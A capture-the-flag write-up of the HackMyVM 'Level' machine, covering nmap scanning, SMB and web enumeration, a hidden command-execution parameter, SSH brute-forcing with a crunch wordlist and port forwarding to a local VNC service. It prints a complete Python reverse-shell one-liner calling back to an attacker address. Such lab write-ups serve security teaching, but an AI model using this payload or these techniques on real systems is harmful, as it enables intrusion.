CTF-Writeups/HackMyVM/Level.md
2021-01-10 21:38:53 +05:00

8.4 KiB

HackMyVM-Level

NMAP


Nmap scan report for 192.168.1.106                                                                                                           [29/61]
Host is up (0.00037s latency).                                                                                                                      
Not shown: 995 closed ports                                                                                                                         
PORT      STATE SERVICE     VERSION                                                                                                                 
21/tcp    open  ftp         vsftpd 3.0.3                                  
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)                    
| ftp-syst:                                                               
|   STAT:                                                                                                                                           
| FTP server status:                 
|      Connected to ::ffff:192.168.1.8                                    
|      Logged in as ftp              
|      TYPE: ASCII                   
|      No session bandwidth limit                                         
|      Session timeout in seconds is 300                                  
|      Control connection is plain text                                   
|      Data connections will be plain text                                
|      At session startup, client count was 1                             
|      vsFTPd 3.0.3 - secure, fast, stable                                
|_End of status                      
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))                
|_http-server-header: Apache/2.4.38 (Debian)                              
|_http-title: Site doesn't have a title (text/html).                      
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                             
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)                                                                          
65000/tcp open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                          
| ssh-hostkey:                       
|   2048 e0:e7:a1:e4:f8:6f:ce:9f:e5:b8:61:a0:83:e8:e4:77 (RSA)                                                                                      
|   256 69:6a:91:6b:bb:bf:60:55:dc:a3:0b:8f:53:b7:83:7b (ECDSA)                                                                                     
|_  256 8e:92:3d:35:d2:25:4e:e2:f4:1e:21:70:56:56:94:e4 (ED25519)    
MAC Address: 08:00:27:8C:C8:F1 (Oracle VirtualBox virtual NIC)                                                                                [0/61]
Service Info: Host: LEVEL; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel                                                                         

Host script results:                 
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: 0s                
|_nbstat: NetBIOS name: LEVEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)                                                            
| smb-os-discovery:                  
|   OS: Windows 6.1 (Samba 4.9.5-Debian)                                  
|   Computer name: level             
|   NetBIOS computer name: LEVEL\x00                                      
|   Domain name: \x00                
|   FQDN: level                      
|_  System time: 2021-01-09T18:41:01+01:00                                
| smb-security-mode:                 
|   account_used: guest              
|   authentication_level: user                                            
|   challenge_response: supported                                         
|_  message_signing: disabled (dangerous, but default)                    
| smb2-security-mode:                
|   2.02:                            
|_    Message signing enabled but not required                            
| smb2-time:                         
|   date: 2021-01-09T17:41:01        
|_  start_date: N/A                  

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                      
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds              

PORT 21 (FTP)

There wasn't anything on ftp server.

PORT 139/445 (SMB)

There weren't any share that we could access as anonymous

Running enum4-linux-ng I found one user by the name of one

PORT 80

Looking at robots.txt

We saw these directories but they were not on the box but if we scroll down a bit we will find a text written in brainfuck

Visting this directory it will give us a sort of wordlist

Using this wordlists we found a directorty

But still we need to enumerate more

I ran the wordlist on directory Level2021

But found a static message, I just made a guess about having cmd paramter and I was right

To get a reverse shell I used the python rev shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then I found a hint in the /home directory

################################################
#                                              #
# changing "x" to "number" can be a great idea #
#                                              #
# one:0n30n3xxx                                #
#                                              #
################################################

I tried guessing the password with

0n30n3111 and 0n30n30n3 but failed.

I ran linpeas and the only thing I could dig out was the open that was open to only localhost

So we can do ssh port forwarding but for that we need a valid password for the user one so going back to .one_secret.txt we may need to craf a wordlist of password with 0n30n3xxx, where xxx will be the random numbers.

I used crunch to make wordlist of the pattern knowing the length of the password which is 9

Then use this wordlist to bruteforce against ssh with the user name one

Lets connect to port 5901 with netcat

Searching this on goolge results in something to do with vnc (virtual networking computing) which is for remote access to a computer similar to windows RDP.

Here RFB 003.008 means remote port is a VNC server and up.Now in order to acess this port we need to do ssh port forwarding.

Now if we go to our browser using localhost:5901 we will get this result

In order to connect to vnc we need a password , by default it is saved in $HOME/.vnc/passwd but in this case it isn't configured to be saved there so we may need to find the password file on the target machine.

In one's directory we can see ... which is a folder

Here remote_level is the encrypted password file for connecting to vnc